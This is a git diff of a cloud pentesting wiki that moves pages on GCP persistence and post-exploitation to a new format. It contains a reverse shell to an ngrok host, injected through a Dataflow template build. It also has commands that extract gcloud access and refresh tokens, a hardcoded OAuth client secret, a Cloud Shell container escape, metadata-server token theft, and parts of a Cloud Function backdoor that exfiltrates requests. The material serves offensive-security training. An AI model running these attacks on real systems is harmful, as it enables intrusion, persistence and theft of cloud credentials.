+../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
new file mode 100644
index 000000000..aebbe350c
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
@@ -0,0 +1,19 @@
+# GCP - Compute Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Compute
+
+For more informatoin about Compute and VPC (Networking) check:
+
+{{#ref}}
+../gcp-services/gcp-compute-instances-enum/
+{{#endref}}
+
+### Persistence abusing Instances & backups
+
+- Backdoor existing VMs
+- Backdoor disk images and snapshots creating new versions
+- Create new accessible instance with a privileged SA
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
new file mode 100644
index 000000000..9eb6791c1
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
@@ -0,0 +1,53 @@
+# GCP - Dataflow Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+### Invisible persistence in built container
+
+Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
+
+```bash
+git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
+cd python-docs-samples/dataflow/flex-templates/getting_started
+
+# Create repository where dockerfiles and code is going to be stored
+export REPOSITORY=flex-example-python
+gcloud storage buckets create gs://$REPOSITORY
+
+# Create artifact storage
+export NAME_ARTIFACT=flex-example-python
+gcloud artifacts repositories create $NAME_ARTIFACT \
+ --repository-format=docker \
+ --location=us-central1
+gcloud auth configure-docker us-central1-docker.pkg.dev
+
+# Create template
+export NAME_TEMPLATE=flex-template
+gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
+ --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
+ --sdk-language "PYTHON" \
+ --flex-template-base-image "PYTHON3" \
+ --metadata-file "metadata.json" \
+ --py-path "." \
+ --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
+ --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
+ --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
+ --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
+ --region=us-central1
+```
+
+**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
+
+Then, next time the job is executed, the compromised container built will be run:
+
+```bash
+# Run template
+gcloud dataflow $NAME_TEMPLATE run testing \
+ --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
+ --parameters=output="gs://$REPOSITORY/out" \
+ --region=us-central1
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
new file mode 100644
index 000000000..2777d5391
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
@@ -0,0 +1,21 @@
+# GCP - Filestore Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Filestore
+
+For more information about Filestore check:
+
+{{#ref}}
+../gcp-services/gcp-filestore-enum.md
+{{#endref}}
+
+### Give broader access and privileges over a mount
+
+An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page:
+
+{{#ref}}
+gcp-filestore-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
new file mode 100644
index 000000000..86265608f
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
@@ -0,0 +1,21 @@
+# GCP - Logging Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Logging
+
+Find more information about Logging in:
+
+{{#ref}}
+../gcp-services/gcp-logging-enum.md
+{{#endref}}
+
+### `logging.sinks.create`
+
+Create a sink to exfiltrate the logs to an attackers accessible destination:
+
+```bash
+gcloud logging sinks create   --log-filter="FILTER_CONDITION"
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
similarity index 63%
rename from pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
rename to src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
index 848dcdb7a..8c553e503 100644
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
@@ -1,55 +1,38 @@
 # GCP - Token Persistance
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ### Authenticated User Tokens
 
 To get the **current token** of a user you can run:
 
-{% code overflow="wrap" %}
 ```bash
 sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='';"
 ```
-{% endcode %}
 
 Check in this page how to **directly use this token using gcloud**:
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1
+{{#endref}}
 
 To get the details to **generate a new access token** run:
 
-{% code overflow="wrap" %}
 ```bash
 sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='';"
 ```
-{% endcode %}
 
 It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
 
 To get a new refreshed access token with the **refresh token**, client ID, and client secret run:
 
-{% code overflow="wrap" %}
 ```bash
 curl -s --data client_id= --data client_secret= --data grant_type=refresh_token --data refresh_token= --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
 ```
-{% endcode %}
 
 The refresh tokens validity can be managed in **Admin** > **Security** > **Google Cloud session control**, and by default it's set to 16h although it can be set to never expire:
 
-

+

 
 ### Auth flow
 
@@ -61,24 +44,21 @@ The authentication flow when using something like `gcloud auth login` will open
 
 Then, gcloud will use the state and code with a some hardcoded `client_id` (`32555940559.apps.googleusercontent.com`) and **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) to get the **final refresh token data**.
 
-{% hint style="danger" %}
-Note that the communication with localhost is in HTTP, so it it's possible to intercept the data to get a refresh token, however this data is valid just 1 time, so this would be useless, it's easier to just read the refresh token from the file.
-{% endhint %}
+> [!CAUTION]
+> Note that the communication with localhost is in HTTP, so it it's possible to intercept the data to get a refresh token, however this data is valid just 1 time, so this would be useless, it's easier to just read the refresh token from the file.
 
 ### OAuth Scopes
 
 You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing:
 
-{% code overflow="wrap" %}
 ```bash
 curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
 ```
-{% endcode %}
 
 It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script:
 
 ```bash
-curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
     echo -ne "Testing $scope         \r"
     if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
         echo ""
@@ -118,20 +98,7 @@ Some remediations for these techniques are explained in [https://www.netskope.co
 
 ### References
 
-* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
-* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
+- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
+- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
new file mode 100644
index 000000000..16b9ea247
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
@@ -0,0 +1,22 @@
+# GCP - Secret Manager Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Secret Manager
+
+Find more information about Secret Manager in:
+
+{{#ref}}
+../gcp-services/gcp-secrets-manager-enum.md
+{{#endref}}
+
+### Rotation misuse
+
+An attacker could update the secret to:
+
+- **Stop rotations** so the secret won't be modified
+- **Make rotations much less often** so the secret won't be modified
+- **Publish the rotation message to a different pub/sub**
+- **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
new file mode 100644
index 000000000..ad54454ba
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
@@ -0,0 +1,38 @@
+# GCP - Storage Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Storage
+
+For more information about Cloud Storage check:
+
+{{#ref}}
+../gcp-services/gcp-storage-enum.md
+{{#endref}}
+
+### `storage.hmacKeys.create`
+
+You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
+
+```bash
+# Create key
+gsutil hmac create 
+
+# Configure gsutil to use it
+gsutil config -a
+
+# Use it
+gsutil ls gs://[BUCKET_NAME]
+```
+
+Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
+
+### Give Public Access
+
+**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-storage-post-exploitation.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
similarity index 100%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
new file mode 100644
index 000000000..4a92c4c1b
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
@@ -0,0 +1,43 @@
+# GCP - App Engine Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## `App Engine`
+
+For information about App Engine check:
+
+{{#ref}}
+../gcp-services/gcp-app-engine-enum.md
+{{#endref}}
+
+### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush`
+
+With these permissions it's possible to:
+
+- Add a key
+- List keys
+- Get a key
+- Delete
+
+> [!CAUTION]
+> However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**.
+>
+> If you know easier ways to use these permissions send a Pull Request!
+
+### `logging.views.access`
+
+With this permission it's possible to **see the logs of the App**:
+
+```bash
+gcloud app logs tail -s 
+```
+
+### Read Source Code
+
+The source code of all the versions and services are **stored in the bucket** with the name **`staging..appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.
+
+### Modify Source Code
+
+Modify source code to steal credentials if they are being sent or perform a defacement web attack.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
new file mode 100644
index 000000000..08e30528d
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
@@ -0,0 +1,21 @@
+# GCP - Artifact Registry Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{{#ref}}
+../gcp-services/gcp-artifact-registry-enum.md
+{{#endref}}
+
+### Privesc
+
+The Post Exploitation and Privesc techniques of Artifact Registry were mixed in:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-artifact-registry-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
new file mode 100644
index 000000000..115fa6ee9
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
@@ -0,0 +1,29 @@
+# GCP - Cloud Build Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Build
+
+For more information about Cloud Build check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-build-enum.md
+{{#endref}}
+
+### `cloudbuild.builds.approve`
+
+With this permission you can approve the execution of a **codebuild that require approvals**.
+
+```bash
+# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
+curl -X POST \
+     -H "Authorization: Bearer $(gcloud auth print-access-token)" \
+     -H "Content-Type: application/json" \
+     -d '{{
+         "approvalResult": {
+           object (ApprovalResult)
+         }}' \
+     "https://cloudbuild.googleapis.com/v1/projects//locations//builds/:approve"
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
similarity index 76%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
index 24c013b55..8057b3b10 100644
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
@@ -1,40 +1,25 @@
 # GCP - Cloud Functions Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Cloud Functions
 
 Find some information about Cloud Functions in:
 
-{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %}
-[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-cloud-functions-enum.md
+{{#endref}}
 
 ### `cloudfunctions.functions.sourceCodeGet`
 
 With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function:
 
-{% code overflow="wrap" %}
 ```bash
 curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
 -H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
 -H "Content-Type: application/json" \
 -d '{}'
 ```
-{% endcode %}
 
 ### Steal Cloud Function Requests
 
@@ -83,7 +68,7 @@ def exfiltrate(request):
     except Exception as e:
         if not "read operation timed out" in str(e):
             return str(e)
-    
+
     return ""
 
 def new_http_view_func_wrapper(function, request):
@@ -93,7 +78,7 @@ def new_http_view_func_wrapper(function, request):
             return function(request._get_current_object(), last=True, error=error)
         except Exception as e:
             return str(e)
-    
+
     return view_func
 """
 
@@ -104,14 +89,14 @@ def injection():
         import flask
         import os
         import importlib
-        import sys        
+        import sys
 
         if os.access('/tmp', os.W_OK):
             new_function_path = "/tmp/function.py"
             with open(new_function_path, "w") as f:
                 f.write(new_function)
             os.chmod(new_function_path, 0o777)
-        
+
         if not os.path.exists('/tmp/function.py'):
             return "/tmp/function.py doesn't exists"
 
@@ -132,12 +117,12 @@ def injection():
             spec_handler.loader.exec_module(module_handler)
             spec_backdoor.loader.exec_module(module_backdoor)
 
-        # make the cloud funtion use as handler the new function 
+        # make the cloud funtion use as handler the new function
         prev_handler = getattr(module_handler, handler_fname)
         new_func_wrap = getattr(module_backdoor, 'new_http_view_func_wrapper')
         app.view_functions["run"] = new_func_wrap(prev_handler, flask.request)
         return "Injection completed!"
-    
+
     except Exception as e:
         return str(e)
 ```
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
new file mode 100644
index 000000000..101518536
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
@@ -0,0 +1,23 @@
+# GCP - Cloud Run Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-run-enum.md
+{{#endref}}
+
+### Access the images
+
+If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables.
+
+If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service.
+
+### Modify & redeploy the image
+
+Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
similarity index 52%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
index cd5dbc522..30135adc2 100644
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
@@ -1,56 +1,38 @@
 # GCP - Cloud Shell Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Cloud Shell
 
 For more information about Cloud Shell check:
 
-{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %}
-[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-cloud-shell-enum.md
+{{#endref}}
 
 ### Container Escape
 
 Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing:
 
-{% code overflow="wrap" %}
 ```bash
 sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
 sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
 sudo docker -H unix:///google/host/var/run/docker.sock start escaper
 sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
 ```
-{% endcode %}
 
 This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env.
 
 Moreover, notice that from the host you can find a service account token:
 
-{% code overflow="wrap" %}
 ```bash
 wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
 default/
 vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
 ```
-{% endcode %}
 
 With the following scopes:
 
-{% code overflow="wrap" %}
 ```bash
 wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
 
@@ -58,19 +40,16 @@ https://www.googleapis.com/auth/devstorage.read_only
 https://www.googleapis.com/auth/logging.write
 https://www.googleapis.com/auth/monitoring.write
 ```
-{% endcode %}
 
 Enumerate metadata with LinPEAS:
 
-{% code overflow="wrap" %}
 ```bash
 cd /tmp
 wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
 sh linpeas.sh -o cloud
 ```
-{% endcode %}
 
-After using [https://github.com/carlospolop/bf\_my\_gcp\_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**...
+After using [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**...
 
 ### Use it as Proxy
 
@@ -120,17 +99,4 @@ cd ngrok;./ngrok tcp 3128
 
 The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
similarity index 53%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
index 1235ac87d..34da94a25 100644
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
@@ -1,27 +1,14 @@
 # GCP - Cloud SQL Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Cloud SQL
 
 For more information about Cloud SQL check:
 
-{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %}
-[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-cloud-sql-enum.md
+{{#endref}}
 
 ### `cloudsql.instances.update`, ( `cloudsql.instances.get`)
 
@@ -64,11 +51,9 @@ gcloud sql users create  --instance  --password  --instance  --password 
 ```
-{% endcode %}
 
 ### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`
 
@@ -115,17 +100,4 @@ Delete a database from the db instance:
 gcloud sql databases delete  --instance 
